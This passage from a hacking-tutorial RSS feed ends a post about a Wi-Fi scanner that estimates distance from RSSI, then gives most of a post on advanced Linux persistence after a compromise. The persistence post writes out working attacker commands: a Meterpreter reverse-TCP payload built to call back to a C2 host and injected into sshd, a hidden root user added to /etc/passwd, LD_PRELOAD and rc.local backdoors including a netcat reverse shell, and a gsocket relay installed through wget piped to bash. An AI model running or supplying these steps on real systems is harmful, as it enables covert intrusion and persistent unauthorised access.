  1675. <p class="has-medium-font-size"><strong>Step #1. Launch &amp; Configuration</strong></p>
  1676.  
  1677.  
  1678.  
  1679. <p><br>Start the script:</p>
  1680.  
  1681.  
  1682.  
  1683. <p><br>kali > sudo python3 Hackers_Arise_Radar.py</p>
  1684.  
  1685.  
  1686.  
  1687. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="579" height="229" src="https://hackers-arise.com/wp-content/uploads/2025/08/Hackers-arise-radar-initiation.png" alt="" class="wp-image-16717" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/Hackers-arise-radar-initiation.png 579w, https://hackers-arise.com/wp-content/uploads/2025/08/Hackers-arise-radar-initiation-300x119.png 300w" sizes="(max-width: 579px) 100vw, 579px" /></figure>
  1688.  
  1689.  
  1690.  
  1691. <p>You’ll be greeted with a colorful terminal interface that guides you through:</p>
  1692.  
  1693.  
  1694.  
  1695. <p><br>&#8211; Selecting your Wi-Fi interface<br>&#8211; Choosing the operational environment (indoor, urban, open space)<br>&#8211; Selecting scan band (2.4 GHz / 5 GHz / 6 GHz / All)</p>
  1696.  
  1697.  
  1698.  
  1699. <p>No need to manually enable monitor mode – the script automatically puts your adapter into monitor mode, sets the regulatory domain, and adjusts TX power based on your choices.</p>
  1700.  
  1701.  
  1702.  
  1703. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="899" height="822" src="https://hackers-arise.com/wp-content/uploads/2025/08/hackers-arise-radar-menu.png" alt="" class="wp-image-16720" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/hackers-arise-radar-menu.png 899w, https://hackers-arise.com/wp-content/uploads/2025/08/hackers-arise-radar-menu-300x274.png 300w, https://hackers-arise.com/wp-content/uploads/2025/08/hackers-arise-radar-menu-768x702.png 768w" sizes="(max-width: 899px) 100vw, 899px" /></figure>
  1704.  
  1705.  
  1706.  
  1707. <p class="has-medium-font-size"><strong>Step #2. Real-Time Wi-Fi Scanning</strong></p>
  1708.  
  1709.  
  1710.  
  1711. <p><br>The script uses airodump-ng behind the scenes to:<br>&#8211; Continuously scan surrounding Wi-Fi networks<br>&#8211; Record BSSID, SSID, RSSI, channel, frequency band<br>&#8211; Stream live updates through a structured CSV output for parsing and analysis</p>
  1712.  
  1713.  
  1714.  
  1715. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="720" height="598" src="https://hackers-arise.com/wp-content/uploads/2025/08/hackersArise-Radar-scan.png" alt="" class="wp-image-16718" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/hackersArise-Radar-scan.png 720w, https://hackers-arise.com/wp-content/uploads/2025/08/hackersArise-Radar-scan-300x249.png 300w" sizes="(max-width: 720px) 100vw, 720px" /></figure>
  1716.  
  1717.  
  1718.  
  1719. <p class="has-medium-font-size"><strong>Step #3. RSSI Filtering &amp; Analytics</strong></p>
  1720.  
  1721.  
  1722.  
  1723. <p><br>To reduce RSSI noise, the script implements a Kalman filter. This Kalman filter:</p>
  1724.  
  1725.  
  1726.  
  1727. <p><br>&#8211; Smooths out transient signal spikes<br>&#8211; Creates a rolling average of RSSI per BSSID<br>&#8211; Improves distance estimation consistency</p>
  1728.  
  1729.  
  1730.  
  1731. <p class="has-medium-font-size"><strong>Step #4. Estimating Distance from RSSI</strong></p>
  1732.  
  1733.  
  1734.  
  1735. <p><br>The tool calculates the distance using a log-distance path loss model such as:</p>
  1736.  
  1737.  
  1738.  
  1739. <p><br>d = 10^((TX_power - RSSI) / (10 * n))</p>
  1740.  
  1741.  
  1742.  
  1743. <p>Where:<br>&#8211; TX_power and path-loss exponent n are customizable or calculated through calibration<br>&#8211; RSSI is dynamically filtered<br>&#8211; Distance is measured in meters</p>
  1744.  
  1745.  
  1746.  
  1747. <p class="has-medium-font-size"><strong>Step #5. Calibration Engine</strong></p>
  1748.  
  1749.  
  1750.  
  1751. <p><br>The included calibration module lets you:</p>
  1752.  
  1753.  
  1754.  
  1755. <p><br>&#8211; Input known RSSI and real-world distances<br>&#8211; Fit an optimized curve per BSSID<br>&#8211; Automatically store TX power, path-loss exponent, and R² fit for reuse<br>&#8211; Flag poorly calibrated networks with suggestions</p>
  1756.  
  1757.  
  1758.  
  1759. <p class="has-medium-font-size"><strong>Step #6. Visual Mapping – Spring Model Layout</strong></p>
  1760.  
  1761.  
  1762.  
  1763. <p><br>Once enough data is gathered, the tool uses a spring-model algorithm to create a map:<br>&#8211; Nodes (BSSIDs) are arranged based on estimated distances<br>&#8211; Forces push/pull the layout into geometric balance<br>&#8211; Labels show SSIDs, bands, and estimated distance in meters</p>
  1764.  
  1765.  
  1766.  
  1767. <p></p>
  1768.  
  1769.  
  1770.  
  1771. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="803" height="644" src="https://hackers-arise.com/wp-content/uploads/2025/08/Hackers-ARise-Radar-map.png" alt="" class="wp-image-16719" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/Hackers-ARise-Radar-map.png 803w, https://hackers-arise.com/wp-content/uploads/2025/08/Hackers-ARise-Radar-map-300x241.png 300w, https://hackers-arise.com/wp-content/uploads/2025/08/Hackers-ARise-Radar-map-768x616.png 768w" sizes="(max-width: 803px) 100vw, 803px" /></figure>
  1772.  
  1773.  
  1774.  
  1775. <p class="has-medium-font-size"><strong>Step #7. Regulatory &amp; Power Tuning Mode</strong></p>
  1776.  
  1777.  
  1778.  
  1779. <p><br>The tool isn&#8217;t just a scanner — it includes a dedicated utility mode to:</p>
  1780.  
  1781.  
  1782.  
  1783. <p><br>&#8211; Set regulatory domain (iw reg set &lt;country_code>)<br>&#8211; Modify TX power (in dBm)<br>&#8211; Retrieve and display current wireless driver info<br>&#8211; Perform diagnostics before scanning</p>
  1784.  
  1785.  
  1786.  
  1787. <h2 class="wp-block-heading">Focus Mode: Tracking a Single Access Point</h2>
  1788.  
  1789.  
  1790.  
  1791. <p>Sometimes you just need to follow one Wi-Fi target — whether it&#8217;s a rogue device, a signal beacon, or an access point you&#8217;re using for indoor positioning.</p>
  1792.  
  1793.  
  1794.  
  1795. <p>Hackers Arise Radar includes a specialized mode for scanning and tracking a single BSSID:</p>
  1796.  
  1797.  
  1798.  
1799. <p><br>&#8211; Select a known access point from your previously scanned list<br>&#8211; The tool locks onto that specific MAC address using:<br>  airodump-ng --bssid &lt;target> --channel &lt;ch><br>&#8211; RSSI values are filtered using a Kalman filter<br>&#8211; Distance estimation is updated in real time using the calibration profile<br>&#8211; Live updates show proximity and confidence</p>
  1800.  
  1801.  
  1802.  
1803. <h2 class="wp-block-heading">Real World Use Cases</h2>
  1804.  
  1805.  
  1806.  
  1807. <p>&#8211; Wardriving Missions: Continuous logs while driving<br>&#8211; Indoor Wireless Mapping: Signal-based AP triangulation, spatial layouts<br>&#8211; Security &amp; Pentesting Recon: Detect new/rogue APs, estimate proximity<br>&#8211; Wi-Fi Optimization: Adjust regulatory domain / TX power, evaluate coverage<br>&#8211; Wireless Simulation &amp; Testing: Simulate RSSI data with simulate_rss_matrix.py</p>
  1808.  
  1809.  
  1810.  
  1811. <h2 class="wp-block-heading">Requirements &amp; Setup</h2>
  1812.  
  1813.  
  1814.  
  1815. <p>&#8211; Platform: Linux (Kali/Debian-based)<br>&#8211; Python: 3.7+<br>&#8211; Privileges: sudo required<br>&#8211; External Tools: aircrack-ng, iw, ip, ethtool<br>&#8211; Python Libraries: numpy, scipy, pandas, matplotlib, adjustText</p>
  1816.  
  1817.  
  1818.  
  1819. <p>Launch simply with:</p>
  1820.  
  1821.  
  1822.  
  1823. <p><br>kali> sudo python3 Hackers_Arise_Radar.py</p>
  1824.  
  1825.  
  1826.  
  1827. <p><br>No need to prep interfaces — the tool handles it all.</p>
  1828.  
  1829.  
  1830.  
  1831. <h2 class="wp-block-heading">Summary</h2>
  1832.  
  1833.  
  1834.  
  1835. <p>Hackers Arise Radar is more than just a scanner. It is a fully interactive system for Wi-Fi discovery, proximity estimation, map generation, and interface configuration — all controlled through an elegant terminal menu.</p>
  1836.  
  1837.  
  1838.  
  1839. <p>Built for hackers, engineers, educators, and hobbyists, this tool empowers you to:<br>&#8211; Visualize your wireless environment<br>&#8211; Optimize TX power and regulatory settings<br>&#8211; Log and export clean data<br>&#8211; Build wireless maps with zero GPS</p>
  1840.  
  1841.  
  1842.  
  1843. <p>Start scanning smarter — not harder.</p>
  1844.  
  1845.  
  1846.  
  1847. <p></p>
  1848.  
  1849.  
  1850.  
  1851. <p>For more information on this unique and powerful scanner, see our Wi-Fi Hacking training.</p>
  1852.  
  1853.  
  1854.  
  1855. <p></p><p>The post <a href="https://hackers-arise.com/python-basics-for-hackers-building-a-wi-fi-scanner-capable-of-locating-the-position-of-local-aps/">Python Basics for Hackers: Building a Wi-Fi Scanner Capable of Locating the Position of Local AP’s</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.</p>]]></content:encoded>
  1856. <wfw:commentRss>https://hackers-arise.com/python-basics-for-hackers-building-a-wi-fi-scanner-capable-of-locating-the-position-of-local-aps/feed/</wfw:commentRss>
  1857. <slash:comments>0</slash:comments>
  1858. </item>
  1859. <item>
  1860. <title>Advanced Linux Persistence: Strategies for Remaining Inside a Linux Target</title>
  1861. <link>https://hackers-arise.com/advanced-linux-persistence-strategies-for-remaining-inside-a-linux-target/</link>
  1862. <dc:creator><![CDATA[Co11ateral]]></dc:creator>
  1863. <pubDate>Fri, 03 Oct 2025 16:40:40 +0000</pubDate>
  1864. <category><![CDATA[Command and Control (C2)]]></category>
  1865. <category><![CDATA[Cyberwar]]></category>
  1866. <category><![CDATA[Cyberwarrior]]></category>
  1867. <category><![CDATA[Hacking]]></category>
  1868. <category><![CDATA[Linux]]></category>
  1869. <category><![CDATA[advanced linux persistence]]></category>
  1870. <category><![CDATA[configuration persistence]]></category>
  1871. <category><![CDATA[covert linux access]]></category>
  1872. <category><![CDATA[cyberwar]]></category>
  1873. <category><![CDATA[gsocket tunneling]]></category>
  1874. <category><![CDATA[HACKING]]></category>
  1875. <category><![CDATA[in-memory persistence]]></category>
  1876. <category><![CDATA[LD_PRELOAD techniques]]></category>
  1877. <category><![CDATA[linux persistence advanced]]></category>
  1878. <category><![CDATA[linux post-exploitation]]></category>
  1879. <category><![CDATA[linux red team]]></category>
  1880. <category><![CDATA[long-term access linux]]></category>
  1881. <category><![CDATA[memory-only payloads]]></category>
  1882. <category><![CDATA[os-configuration abuse]]></category>
  1883. <category><![CDATA[persistence and evasion]]></category>
  1884. <category><![CDATA[persistence guide linux]]></category>
  1885. <category><![CDATA[post-exploitation techniques]]></category>
  1886. <category><![CDATA[rc.local persistence]]></category>
  1887. <category><![CDATA[stealth persistence methods]]></category>
  1888. <category><![CDATA[stealthy backdoors]]></category>
  1889. <category><![CDATA[tunneling for persistence]]></category>
  1890. <guid isPermaLink="false">https://hackers-arise.com/?p=17343</guid>
  1891.  
  1892. <description><![CDATA[<p>From memory-only implants and OS configuration tricks to LD_PRELOAD hooks, rc.local startup hooks, and cloud-relay tunneling. A strategic playbook shows how advanced techniques complement basic persistence to build a resilient foothold.</p>
  1893. <p>The post <a href="https://hackers-arise.com/advanced-linux-persistence-strategies-for-remaining-inside-a-linux-target/">Advanced Linux Persistence: Strategies for Remaining Inside a Linux Target</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.</p>]]></description>
  1894. <content:encoded><![CDATA[<p>Welcome back, aspiring hackers! </p>
  1895.  
  1896.  
  1897.  
  1898. <p></p>
  1899.  
  1900.  
  1901.  
  1902. <p>In part one of our Linux persistence series, we covered the basics &#8211; the quick wins that keep you connected after a compromise. Now it’s time to take things up a notch. In this part, we’re going to dive into techniques that give you more flexibility, more stealth, and in some cases, more durability than the simple shell loops, autostarts, and cron jobs we looked at before.</p>
  1903.  
  1904.  
  1905.  
  1906. <p>We’ll start with in-memory payloads, where nothing ever touches disk, making them almost invisible while they’re running. Then we’ll look at persistence through operating system configuration changes. No malware needed, just some creative abuse of the system’s own settings. From there, we’ll move into <strong>LD_PRELOAD</strong>, a legitimate Linux feature that can quietly hook into processes and run our code without launching any suspicious binaries. We’ll also talk about rc.local for those times you want a simple, one-shot startup hook, and we’ll finish with <strong>gsocket</strong>, a powerful tunneling tool that can keep a connection alive even when the network is working against you.</p>
  1907.  
  1908.  
  1909.  
  1910. <p>By the end of this part, you’ll have a toolkit that covers both stealthy short-term access and long-term, hard-to-shake persistence. And if you combine what we’ve done here with the foundations from part one, you’ll have the range to adapt to just about any post-exploitation environment.</p>
  1911.  
  1912.  
  1913.  
  1914. <h2 class="wp-block-heading"><strong>In-Memory</strong></h2>
  1915.  
  1916.  
  1917.  
  1918. <p>An in-memory backdoor is a persistence-adjacent technique aimed at maintaining control without leaving forensic traces on disk. Instead of writing a payload to the filesystem, you inject it directly into the memory space of a running process. This approach is attractive when stealth is a higher priority than durability, as most antivirus solutions perform limited real-time inspection of memory. Even technically adept users are unlikely to notice a malicious implant if it resides inside a legitimate, already-running process.</p>
  1919.  
  1920.  
  1921.  
  1922. <p>In this example, the chosen payload is Meterpreter, a well-known tool capable of operating entirely in memory. A typical workflow might look like this:</p>
  1923.  
  1924.  
  1925.  
  1926. <p><code>c2 &gt; msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=C2_IP LPORT=9005 exitfunc=thread StagerRetryCount=999999 -f raw -o meter64.bin</code></p>
  1927.  
  1928.  
  1929.  
  1930. <figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="106" src="https://hackers-arise.com/wp-content/uploads/2025/08/1-creating-an-in-memory-payload-with-msfvenom-1024x106.webp" alt="creating an in-memory payload with msfvenom" class="wp-image-17344" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/1-creating-an-in-memory-payload-with-msfvenom-1024x106.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/08/1-creating-an-in-memory-payload-with-msfvenom-300x31.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/08/1-creating-an-in-memory-payload-with-msfvenom-768x79.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/08/1-creating-an-in-memory-payload-with-msfvenom.webp 1256w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  1931.  
  1932.  
  1933.  
1934. <p>Here, <code>msfvenom</code> generates a raw Meterpreter reverse TCP payload configured to connect back to our C2 at the specified host and port.</p>
  1935.  
  1936.  
  1937.  
1938. <p><code>exitfunc=thread</code> controls how the payload cleans up when it finishes or encounters an error. Thread means it will terminate only the thread it is running in, leaving the rest of the host process alive. This is critical for in-memory injection into legitimate processes because it avoids crashing them and raising suspicion.</p>
  1939.  
  1940.  
  1941.  
  1942. <p><code>StagerRetryCount=999999</code> instructs the stager to retry the connection up to 999,999 times if it fails. Without this, a dropped connection might require re-injecting the payload. With it, the backdoor keeps trying indefinitely until we are ready to receive the connection.</p>
  1943.  
  1944.  
  1945.  
1946. <p>With <code>pgrep</code> you list processes to inject your payload into:</p>
  1947.  
  1948.  
  1949.  
  1950. <p><code>target#&gt; pgrep -x sshd</code></p>
  1951.  
  1952.  
  1953.  
  1954. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="393" height="87" src="https://hackers-arise.com/wp-content/uploads/2025/08/2-finding-a-system-proccess-to-inject-an-in-memory-payload-into.webp" alt="finding a process with pgrep to inject the in-memory payload into with " class="wp-image-17345" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/2-finding-a-system-proccess-to-inject-an-in-memory-payload-into.webp 393w, https://hackers-arise.com/wp-content/uploads/2025/08/2-finding-a-system-proccess-to-inject-an-in-memory-payload-into-300x66.webp 300w" sizes="(max-width: 393px) 100vw, 393px" /></figure>
  1955.  
  1956.  
  1957.  
  1958. <p><code>target#&gt; mv /root/meter64.bin /root/mmap64.bin</code></p>
  1959.  
  1960.  
  1961.  
  1962. <p><code>target#&gt; inject_linux 1032 mmap64.bin</code></p>
  1963.  
  1964.  
  1965.  
  1966. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="725" height="294" src="https://hackers-arise.com/wp-content/uploads/2025/08/3-injecting-the-payload-into-a-proccess.webp" alt="injecting the in-memory payload with inject_linux into a process" class="wp-image-17346" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/3-injecting-the-payload-into-a-proccess.webp 725w, https://hackers-arise.com/wp-content/uploads/2025/08/3-injecting-the-payload-into-a-proccess-300x122.webp 300w" sizes="(max-width: 725px) 100vw, 725px" /></figure>
  1967.  
  1968.  
  1969.  
1970. <p>The <code>inject_linux</code> utility then injects the binary blob into the process identified by PID, causing that process to execute the payload entirely in memory. No new file is created on disk, and no service or scheduled task is registered. Note: you might need to rename your payload to <code>mmap64.bin</code>.</p>
  1971.  
  1972.  
  1973.  
  1974. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="928" height="145" src="https://hackers-arise.com/wp-content/uploads/2025/08/4-receiving-a-connection-on-metasploit.webp" alt="receiving a reverse connection" class="wp-image-17347" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/4-receiving-a-connection-on-metasploit.webp 928w, https://hackers-arise.com/wp-content/uploads/2025/08/4-receiving-a-connection-on-metasploit-300x47.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/08/4-receiving-a-connection-on-metasploit-768x120.webp 768w" sizes="(max-width: 928px) 100vw, 928px" /></figure>
  1975.  
  1976.  
  1977.  
  1978. <p><strong>Pros:</strong> Works under any user account, extremely difficult for a human observer to detect, and avoids leaving traditional artifacts like startup entries or executable files on disk.</p>
  1979.  
  1980.  
  1981.  
  1982. <p><strong>Cons:</strong> Does not survive a reboot. The moment the system restarts or the host process ends, the implant disappears.</p>
  1983.  
  1984.  
  1985.  
  1986. <p>While this method lacks persistence in the strict sense, it provides a highly covert foothold for as long as the target system remains powered on. In a layered intrusion strategy, in-memory implants can complement more traditional persistence mechanisms by offering an immediately available, stealthy access channel alongside longer-lived backdoors.</p>
  1987.  
  1988.  
  1989.  
  1990. <h2 class="wp-block-heading"><strong>Configs</strong></h2>
  1991.  
  1992.  
  1993.  
  1994. <p>Persistence through configuration changes takes a different path from typical backdoors or reverse shells. Instead of running malicious code, it manipulates the operating system’s own settings to ensure we can regain access later. Because there is no executable payload, such changes are far less likely to trigger antivirus detection. However, this method is viable only when you have direct access to the target system and sufficient privileges to modify core configuration files.</p>
  1995.  
  1996.  
  1997.  
  1998. <p>One of the most common examples is creating a hidden user account that can be used for future remote logins. In the example:</p>
  1999.  
  2000.  
  2001.  
  2002. <p><code>target# &gt; openssl passwd -1 -salt test P@ssw0rd123</code></p>
  2003.  
  2004.  
  2005.  
  2006. <p><code>target# &gt; echo 'post:$1$test$dIndzcyu0SmwXz37byHei0:0:0::/:/bin/sh' &gt;&gt; /etc/passwd</code></p>
  2007.  
  2008.  
  2009.  
  2010. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="775" height="119" src="https://hackers-arise.com/wp-content/uploads/2025/08/5-creating-a-hidden-user-in-passwd-file.webp" alt="creating a hidden user with a root shell" class="wp-image-17348" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/5-creating-a-hidden-user-in-passwd-file.webp 775w, https://hackers-arise.com/wp-content/uploads/2025/08/5-creating-a-hidden-user-in-passwd-file-300x46.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/08/5-creating-a-hidden-user-in-passwd-file-768x118.webp 768w" sizes="(max-width: 775px) 100vw, 775px" /></figure>
  2011.  
  2012.  
  2013.  
2014. <p>The first command uses <code>openssl passwd</code> with the <code>-1</code> flag to generate an MD5-based hashed password (<code>-salt test</code> specifies a custom salt, here “test”) for the chosen password <code>P@ssw0rd123</code>. The output is a string in the format expected by <code>/etc/passwd</code>.</p>
  2015.  
  2016.  
  2017.  
  2018. <p>The second command appends a new entry to <code>/etc/passwd</code> for a user named post, with the generated password hash, UID 0, and GID 0 (making it equivalent to the root user), no home directory, and <code>/bin/sh</code> as its shell. This effectively creates a hidden superuser account.</p>
  2019.  
  2020.  
  2021.  
2022. <p>Finally, make sure you have modified the <code>/etc/ssh/sshd_config</code> file to ensure that root (and by extension, the post account with UID 0) can log in over SSH (<code>PermitRootLogin yes</code>). This ensures you can reconnect remotely, provided the target system is reachable over the network.</p>
  2023.  
  2024.  
  2025.  
  2026. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="672" height="123" src="https://hackers-arise.com/wp-content/uploads/2025/08/6-editing-the-sshd_config.webp" alt="editing the sshd_config to allow root login" class="wp-image-17349" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/6-editing-the-sshd_config.webp 672w, https://hackers-arise.com/wp-content/uploads/2025/08/6-editing-the-sshd_config-300x55.webp 300w" sizes="(max-width: 672px) 100vw, 672px" /></figure>
  2027.  
  2028.  
  2029.  
2030. <p>After that, restart the SSH service:</p>
  2031.  
  2032.  
  2033.  
  2034. <p><code>target# &gt; service sshd restart</code></p>
  2035.  
  2036.  
  2037.  
  2038. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="760" height="155" src="https://hackers-arise.com/wp-content/uploads/2025/08/7-connecting-to-a-host-with-a-root-user.webp" alt="connecting via ssh" class="wp-image-17350" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/7-connecting-to-a-host-with-a-root-user.webp 760w, https://hackers-arise.com/wp-content/uploads/2025/08/7-connecting-to-a-host-with-a-root-user-300x61.webp 300w" sizes="(max-width: 760px) 100vw, 760px" /></figure>
  2039.  
  2040.  
  2041.  
2042. <p><strong>Pros:</strong> Survives reboots and does not require running any malicious executable.</p>
  2043.  
  2044.  
  2045.  
  2046. <p><strong>Cons:</strong> Requires administrative or root privileges to modify system files, and is ineffective if the machine is behind NAT or a restrictive firewall that blocks inbound connections.</p>
  2047.  
  2048.  
  2049.  
  2050. <p>This method is a pure OS-level manipulation. It leaves no malicious process in memory, but its success depends entirely on your ability to later connect directly to the host. In targeted intrusions, it is often combined with other persistence methods to ensure redundancy.</p>
  2051.  
  2052.  
  2053.  
  2054. <h2 class="wp-block-heading"><strong>LD_PRELOAD</strong></h2>
  2055.  
  2056.  
  2057.  
  2058. <p>Using <strong>LD_PRELOAD </strong>for persistence takes advantage of a legitimate dynamic linking feature in Linux to inject custom code into every newly launched process. The <strong>LD_PRELOAD </strong>environment variable tells the dynamic linker to load a specified shared library before any others, allowing our code to override or hook standard library functions in user-space applications. This approach can be used to execute arbitrary logic, including establishing a shell or logging credentials.</p>
  2059.  
  2060.  
  2061.  
2062. <p><br>First we create a <code>meter.c</code> file which will later be compiled into <code>meter.so</code>.</p>
  2063.  
  2064.  
  2065.  
  2066. <p><code>target# &gt; nano meter.c</code></p>
  2067.  
  2068.  
  2069.  
  2070. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="816" height="213" src="https://hackers-arise.com/wp-content/uploads/2025/08/8-crafting-meter.c-for-LD_PRELOAD.webp" alt="creating a meter.c file for LD_PRELOAD persistence" class="wp-image-17351" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/8-crafting-meter.c-for-LD_PRELOAD.webp 816w, https://hackers-arise.com/wp-content/uploads/2025/08/8-crafting-meter.c-for-LD_PRELOAD-300x78.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/08/8-crafting-meter.c-for-LD_PRELOAD-768x200.webp 768w" sizes="(max-width: 816px) 100vw, 816px" /></figure>
  2071.  
  2072.  
  2073.  
  2074. <p>Then the payload is compiled with the following command:</p>
  2075.  
  2076.  
  2077.  
2078. <p><code>c2 &gt; gcc -fPIC -shared -o meter.so meter.c</code></p>
  2079.  
  2080.  
  2081.  
  2082. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="596" height="107" src="https://hackers-arise.com/wp-content/uploads/2025/08/9-compiling-a-binary-into-meter-so.webp" alt="comping the meter.c file" class="wp-image-17352" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/9-compiling-a-binary-into-meter-so.webp 596w, https://hackers-arise.com/wp-content/uploads/2025/08/9-compiling-a-binary-into-meter-so-300x54.webp 300w" sizes="(max-width: 596px) 100vw, 596px" /></figure>
  2083.  
  2084.  
  2085.  
  2086. <p>Next you write the path to your shared object (<code>meter.so</code>) into <code>/etc/ld.so.preload</code>. This file is consulted by the dynamic linker globally, meaning every dynamically linked binary will load the specified library, regardless of which user runs it. This requires root privileges.</p>
  2087.  
  2088.  
  2089.  
  2090. <p><code>target#&gt; echo /path/to/meter.so &gt;&gt; /etc/ld.so.preload</code></p>
  2091.  
  2092.  
  2093.  
2094. <p>Then you add an <code>export LD_PRELOAD=/path/to/meter.so</code> line to <code>/etc/profile</code>, ensuring that all users who log in through an interactive shell will have the environment variable set automatically:</p>
  2095.  
  2096.  
  2097.  
  2098. <p><code>target#&gt; echo export LD_PRELOAD=/path/to/meter.so &gt;&gt; /etc/profile</code></p>
  2099.  
  2100.  
  2101.  
2102. <p>This command does the same but only for a single user by appending the export command to that user’s <code>~/.bashrc</code>:</p>
  2103.  
  2104.  
  2105.  
  2106. <p><code>target$&gt; echo export LD_PRELOAD=/path/to/meter.so &gt;&gt; ~/.bashrc</code></p>
  2107.  
  2108.  
  2109.  
  2110. <p><strong>Pros</strong>: Survives reboots, works under any user account, and can be applied system-wide or per-user. It allows the injected code to run within the context of legitimate processes, making detection harder.</p>
  2111.  
  2112.  
  2113.  
  2114. <p><strong>Cons:</strong> The execution interval is uncontrolled, as code runs only when a new process starts, so reconnection timing is less predictable than with scheduled tasks or services.</p>
  2115.  
  2116.  
  2117.  
  2118. <h2 class="wp-block-heading"><strong>rc.local</strong></h2>
  2119.  
  2120.  
  2121.  
  2122. <p>Persistence via <strong>rc.local</strong> relies on a legacy startup mechanism in Linux systems. The <strong>/etc/rc.local</strong> script, if present and executable, is run automatically by the init system once at the end of the multi-user boot sequence. By inserting a command into this file, we can ensure our payload executes automatically the next time the system restarts.</p>
  2123.  
  2124.  
  2125.  
  2126. <p><code>target#&gt; echo "nc C2_IP 8888 -e /bin/bash &amp;" &gt;&gt; /etc/rc.local</code></p>
  2127.  
  2128.  
  2129.  
  2130. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="699" height="156" src="https://hackers-arise.com/wp-content/uploads/2025/08/10-settign-up-rc.local-persistence-with-netcat.webp" alt="creating rc.local persistence" class="wp-image-17353" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/10-settign-up-rc.local-persistence-with-netcat.webp 699w, https://hackers-arise.com/wp-content/uploads/2025/08/10-settign-up-rc.local-persistence-with-netcat-300x67.webp 300w" sizes="(max-width: 699px) 100vw, 699px" /></figure>
  2131.  
  2132.  
  2133.  
  2134. <p>This appends a netcat command to <code>/etc/rc.local</code> that, when executed, connects back to our host on port 8888 and spawns <code>/bin/bash</code>, providing an interactive reverse shell. The ampersand (<code>&amp;</code>) runs it in the background so it does not block the rest of the boot process.</p>
  2135.  
  2136.  
  2137.  
  2138. <p>Because <code>rc.local</code> executes only once during startup, the payload will not continuously attempt reconnection. It will run a single time after each reboot. If the connection fails at that moment, for instance, if your listener is not ready or the network link is down, no further attempts will be made until the next reboot.</p>
  2139.  
  2140.  
  2141.  
  2142. <p><strong>Pros:</strong> Survives reboots and is simple to implement.</p>
  2143.  
  2144.  
  2145.  
2146. <p><strong>Cons:</strong> Requires root privileges to modify <code>/etc/rc.local</code>, and the execution interval is uncontrolled: it runs only once per boot, offering no retry mechanism between reboots.</p>
  2147.  
  2148.  
  2149.  
  2150. <p>While this method is straightforward and low-profile, it is limited in reliability. In modern Linux distributions, <code>rc.local</code> is often disabled by default or replaced by systemd service files, making it more of a legacy technique. For attackers seeking long-term, automated persistence, it’s usually combined with other methods that retry connections or run continuously.</p>
  2151.  
  2152.  
  2153.  
  2154. <h2 class="wp-block-heading"><strong>Gsocket</strong></h2>
  2155.  
  2156.  
  2157.  
  2158. <p>Gsocket is a cloud relay both sides connect to, linking their outbound connections into a single encrypted two-way tunnel. From our perspective as attackers, that’s gold: we don’t need an open inbound port on the victim, we don’t have to wrestle with NATs or port-forwards, and a single cloud broker becomes a C2 for many targets. Long-lived outbound TLS-like streams blend into normal egress traffic, so the connection looks far less suspicious than an exposed listener.</p>
  2159.  
  2160.  
  2161.  
2162. <p>We like Gsocket because it massively reduces operational overhead. There is less infrastructure to maintain and a much better success rate in restrictive networks because everything is outbound.</p>
  2163.  
  2164.  
  2165.  
  2166. <p>Here is how you install it on the target:</p>
  2167.  
  2168.  
  2169.  
  2170. <p><code>target# &gt; bash -c "$(wget --no-verbose -O- <a href="https://gsocket.io/y">https://gsocket.io/y</a>)"</code></p>
  2171.  
  2172.  
  2173.  
  2174. <p><code>target$ &gt; bash -c "$(wget --no-verbose -O- https://gsocket.io/y)"</code></p>
  2175.  
  2176.  
  2177.  
  2178. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="773" height="311" src="https://hackers-arise.com/wp-content/uploads/2025/08/11-setting-up-gsocket.webp" alt="installing gs-netcat on the target" class="wp-image-17354" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/11-setting-up-gsocket.webp 773w, https://hackers-arise.com/wp-content/uploads/2025/08/11-setting-up-gsocket-300x121.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/08/11-setting-up-gsocket-768x309.webp 768w" sizes="(max-width: 773px) 100vw, 773px" /></figure>
  2179.  
  2180.  
  2181.  
2182. <p>Next, install it on your C2 and access it with the secret key:</p>
  2183.  
  2184.  
  2185.  
  2186. <p><code>c2 &gt; sudo apt install gsocket</code></p>
  2187.  
  2188.  
  2189.  
2190. <p><code>c2 &gt; gs-netcat -s "secret key" -i</code></p>
  2191.  
  2192.  
  2193.  
